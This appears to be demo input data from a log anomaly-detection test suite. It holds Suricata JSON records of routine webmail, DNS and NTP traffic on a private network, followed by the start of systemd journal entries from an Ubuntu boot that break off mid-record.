{"timestamp":"2020-02-29T00:27:27.238886+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:27:27.240253+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":10}} {"timestamp":"2020-02-29T00:27:27.242259+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:27:27.243179+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":11}} {"timestamp":"2020-02-29T00:27:27.285318+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453}} {"timestamp":"2020-02-29T00:27:30.000182+0000","event_type":"stats","stats":{"uptime":15302,"capture":{"kernel_packets":142700,"kernel_drops":0},"decoder":{"pkts":142763,"bytes":98051560,"invalid":196,"ipv4":141162,"ipv6":10,"ethernet":142763,"raw":0,"null":0,"sll":0,"tcp":135557,"udp":5394,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089568},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2932,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2948,"synack":2939,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":789,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2468,"failed_udp":116},"tx":{"http":5092,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2552}},"flow_mgr":{"closed_pruned":2906,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11550,"memcap_state":0,"memcap_global":0},"http":{"memuse":139966,"memcap":0}}} {"timestamp":"2020-02-29T00:27:30.000939+0000","flow_id":1547093101856505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:29.476921+0000","end":"2020-02-29T00:22:29.588304+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:30.515394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":10}} {"timestamp":"2020-02-29T00:27:30.515611+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} {"timestamp":"2020-02-29T00:27:30.518621+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":11}} {"timestamp":"2020-02-29T00:27:30.518909+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52021,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39633,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:30.546775+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/answered.png","state":"CLOSED","stored":false,"size":453,"tx_id":12}} {"timestamp":"2020-02-29T00:27:30.561472+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484}} {"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.707466+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.753180+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} {"timestamp":"2020-02-29T00:27:32.000618+0000","flow_id":2038445950622291,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:31.449107+0000","end":"2020-02-29T00:22:31.611622+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:32.125265+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53188,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":0}} {"timestamp":"2020-02-29T00:27:32.129074+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":1}} {"timestamp":"2020-02-29T00:27:33.000536+0000","flow_id":1323200751894490,"event_type":"flow","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.557018+0000","end":"2020-02-29T00:22:32.668240+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.000913+0000","flow_id":945608701983486,"event_type":"flow","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:31.998142+0000","end":"2020-02-29T00:22:32.109469+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.001064+0000","flow_id":385837024447768,"event_type":"flow","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.888088+0000","end":"2020-02-29T00:22:32.999298+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.001283+0000","flow_id":1660149541607404,"event_type":"flow","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":825,"bytes_toclient":648,"start":"2020-02-29T00:26:27.956396+0000","end":"2020-02-29T00:26:32.959944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:33.001618+0000","flow_id":2245167021588029,"event_type":"flow","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.753213+0000","end":"2020-02-29T00:22:32.864442+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:34.000688+0000","flow_id":467437123496173,"event_type":"flow","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1004,"bytes_toclient":798,"start":"2020-02-29T00:26:27.944365+0000","end":"2020-02-29T00:26:33.119119+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:35.523857+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":12}} {"timestamp":"2020-02-29T00:27:35.714780+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":14}} {"timestamp":"2020-02-29T00:27:36.344575+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38284,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:36.475284+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38285,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:37.000318+0000","event_type":"stats","stats":{"uptime":15309,"capture":{"kernel_packets":143203,"kernel_drops":0},"decoder":{"pkts":143205,"bytes":98434268,"invalid":196,"ipv4":141600,"ipv6":10,"ethernet":143205,"raw":0,"null":0,"sll":0,"tcp":135993,"udp":5396,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2936,"ssn_memcap_drop":0,"pseudo":357,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2952,"synack":2943,"rst":1227,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":793,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2469,"failed_udp":116},"tx":{"http":5096,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2553}},"flow_mgr":{"closed_pruned":2908,"new_pruned":17,"est_pruned":2557,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}}logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/journal.log000066400000000000000000025216521437606560100320520ustar00rootroot00000000000000{ "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1;b=e2b08827b5804427b422c10c84f1567e;m=5580a6;t=5bd16dd19000e;x=c051adcbd24ec9d9", "__REALTIME_TIMESTAMP" : "1615280779886606", "__MONOTONIC_TIMESTAMP" : "5603494", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "MESSAGE" : "Linux version 4.15.0-60-generic (buildd@lgw01-amd64-030) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #67-Ubuntu SMP Thu Aug 22 16:55:30 UTC 2019 (Ubuntu 4.15.0-60.67-generic 4.15.18)", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2;b=e2b08827b5804427b422c10c84f1567e;m=5580ef;t=5bd16dd190056;x=6625bc488f616068", "__REALTIME_TIMESTAMP" : "1615280779886678", "__MONOTONIC_TIMESTAMP" : "5603567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3;b=e2b08827b5804427b422c10c84f1567e;m=5580fc;t=5bd16dd190063;x=b9b11c44043d6efd", "__REALTIME_TIMESTAMP" : "1615280779886691", "__MONOTONIC_TIMESTAMP" : "5603580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KERNEL supported cpus:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4;b=e2b08827b5804427b422c10c84f1567e;m=558105;t=5bd16dd19006c;x=73e76d9bac5bf174", "__REALTIME_TIMESTAMP" : "1615280779886700", "__MONOTONIC_TIMESTAMP" : "5603589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Intel GenuineIntel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5;b=e2b08827b5804427b422c10c84f1567e;m=55810d;t=5bd16dd190075;x=e0fc2ab01305acb9", "__REALTIME_TIMESTAMP" : "1615280779886709", "__MONOTONIC_TIMESTAMP" : "5603597", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " AMD AuthenticAMD" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6;b=e2b08827b5804427b422c10c84f1567e;m=558116;t=5bd16dd19007d;x=2b216ce1cd7e969b", "__REALTIME_TIMESTAMP" : "1615280779886717", "__MONOTONIC_TIMESTAMP" : "5603606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Centaur CentaurHauls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7;b=e2b08827b5804427b422c10c84f1567e;m=558123;t=5bd16dd19008b;x=753688cca998c71f", "__REALTIME_TIMESTAMP" : "1615280779886731", "__MONOTONIC_TIMESTAMP" : "5603619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" 